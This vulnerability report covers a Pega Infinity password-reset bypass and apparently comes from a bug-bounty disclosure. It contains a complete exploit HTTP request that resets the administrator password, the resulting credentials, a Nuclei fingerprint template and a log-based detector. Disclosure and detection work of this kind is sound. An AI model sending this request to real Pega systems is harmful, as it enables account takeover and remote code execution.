## Summary
An attacker can bypass every stage of the password reset flow and reset any user's password on Pega Infinity. The attack is (1) initiating the password reset flow with the victim's email address, then (2) sending the HTTP POST that performs the password update directly, skipping the confirmation step that is supposed to gate it. The attacker can then log in as the victim and fully compromise the Pega instance through the many post-authentication code execution vectors that an administrator is allowed to use (editing dynamic pages, templating, etc.).

## Steps to Reproduce
1. Browse to the login page of any Pega instance.
2. Click "reset password".
3. Enter "administrator@pega.com" as the account to reset, with an intercepting proxy (Burp or similar) in front of the browser. Send the captured reset request to Repeater (or an equivalent tab), then let the original request go through, either by disabling interception or by forwarding it.
4. With the reset initiated, modify the request in Repeater so that it targets the endpoint below and carries the body below. `:PEGA_ID` is a per-site identifier that appears in the instance's own URLs (format: `ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W`); `yourCookie` is the cookie of the session in which the reset was initiated. Note that the captured request carries the activity name with its `=` percent-encoded (`pyActivity%3DCode-Security.pzChangeUserPassword=`); send the body exactly as shown.

```
POST /prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://redacted.com
DNT: 1
Connection: close
Referer: https://redacted.com/prweb/PRServlet/app/default/:PEGA_ID*/!STANDARD
Cookie: yourCookie
Upgrade-Insecure-Requests: 1

pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234&pyActivity%3DCode-Security.pzChangeUserPassword=
```

5. Send the request. The confirmation part of the password reset has been bypassed and the administrator's password is now `Rules@1234`; log in to the administrator account with:

```
administrator@pega.com / Rules@1234
```

6. From there, RCE is reachable through any of the many administrator-only code execution vectors that Pega provides by design.

## Affected Versions
Pega Infinity >= 8.2.1 and <= 8.5.2 (8.2.1 through 8.5.2 inclusive)

## Impact
Full compromise of any affected Pega instance. No credentials or prior knowledge are required beyond the target URL and a username or email to reset (the default administrator account is used above).

## Supporting Media
![Password bypass](https://i.imgur.com/kxLRhys.png)
* Password bypass

![Remote code execution via shell upload](https://i.imgur.com/zC8kOfG.png)
* Remote code execution via shell upload

## Nuclei Template
```
# Fingerprint only: the unauthenticated API docs page mentions "Pega API".
# This identifies a Pega instance but does not confirm the affected version
# range, hence severity: low. `requests:` is the legacy nuclei v2 key for this
# block; later releases renamed it to `http:`.
id: pega

info:
  name: Pega Infinity Login
  author: sshell
  severity: low

requests:
  - method: GET
    path:
      - "{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs"
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      - type: word
        words:
          - "Pega API"
```

## Credit
Samuel Curry (@samwcyo), Brett Buerhaus (@bbuerhaus), Maik Robert (@xEHLE_), Justin Rhinehart (@sshell_)
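## Detecting Exploitation

For defenders, the request shape above gives a detection: the exploit is a POST to a `/prweb/PRServlet/` URL whose body invokes `Code-Security.pzChangeUserPassword` while still carrying the unauthenticated marker `pzAuth=guest`. The detector below is an added example, not from the original report. Its JSON-lines log format and sample records are constructed for illustration (a reverse proxy or WAF that logs request bodies would produce something similar), and the benign `Code-Security.Login` record is an assumption used only as a non-match. It percent-decodes the body before matching because the captured request hides the activity behind `pyActivity%3D...`, which a literal `pyActivity=` match would miss.

```python
"""Detection for the reset-bypass request shape described in this report.

Added example, not from the original report. Log format and sample records
are constructed for illustration; the Code-Security.Login record is an
assumption used only as a non-matching example.
"""
import json
import re
import urllib.parse
from typing import List, Optional, Tuple

BYPASS_ACTIVITY = "Code-Security.pzChangeUserPassword"
ACTIVITY_RE = re.compile(r"(?:^|&)pyActivity=([A-Za-z0-9_.\-]+)")
GUEST_RE = re.compile(r"(?:^|&)pzAuth=guest(?:&|$)")

# Constructed sample records (not from any real system).
SAMPLE_LOG = """
{"src": "203.0.113.7", "method": "POST", "path": "/prweb/PRServlet/app/default/ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W*/!STANDARD", "body": "pzAuth=guest&NewPassword=Rules%401234&ConfPassword=Rules%401234&pyActivity%3DCode-Security.pzChangeUserPassword="}
{"src": "192.0.2.4", "method": "POST", "path": "/prweb/PRServlet/app/default/ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W*/!STANDARD", "body": "pzAuth=guest&UserIdentifier=jdoe%40example.com&Password=hunter2&pyActivity=Code-Security.Login"}
{"src": "198.51.100.9", "method": "POST", "path": "/prweb/PRServlet/app/default/ZOgwf2Zk3OsEg_oG74MXXxG2bXKbv56W*/!STANDARD", "body": "NewPassword=Spring2021%21&ConfPassword=Spring2021%21&pyActivity=Code-Security.pzChangeUserPassword"}
{"src": "192.0.2.4", "method": "GET", "path": "/prweb/PRRestService/unauthenticatedAPI/v1/docs", "body": ""}
"""


def decode_form_body(body: str, rounds: int = 3) -> str:
    """Percent-decode the body (bounded repeat) so the captured form, which
    hides the activity behind pyActivity%3D..., and a literal pyActivity=...
    form are matched the same way."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote_plus(body)
        if decoded == body:
            break
        body = decoded
    return body


def classify(record: dict) -> Optional[str]:
    """Return 'reset-bypass', 'direct-password-change' or None for one record."""
    if record.get("method") != "POST" or not record.get("path", "").startswith("/prweb/PRServlet/"):
        return None
    body = decode_form_body(record.get("body", ""))
    if BYPASS_ACTIVITY not in ACTIVITY_RE.findall(body):
        return None
    # The exploit invokes the password-change activity while still presenting
    # itself as the unauthenticated guest (pzAuth=guest).
    if GUEST_RE.search(body):
        return "reset-bypass"
    return "direct-password-change"  # no guest marker: lower severity, still worth review


def scan(log_text: str) -> List[Tuple[str, str]]:
    """Run classify over JSON lines and return (source address, verdict) pairs."""
    findings = []
    for line in log_text.strip().splitlines():
        record = json.loads(line)
        verdict = classify(record)
        if verdict is not None:
            findings.append((record["src"], verdict))
    return findings


if __name__ == "__main__":
    for src, verdict in scan(SAMPLE_LOG):
        print(f"{src}: {verdict}")
```

The second verdict exists because an authenticated user changing their own password also invokes `Code-Security.pzChangeUserPassword`; only the combination with `pzAuth=guest` matches the bypass described above, so the two are kept apart rather than alerting on the activity name alone.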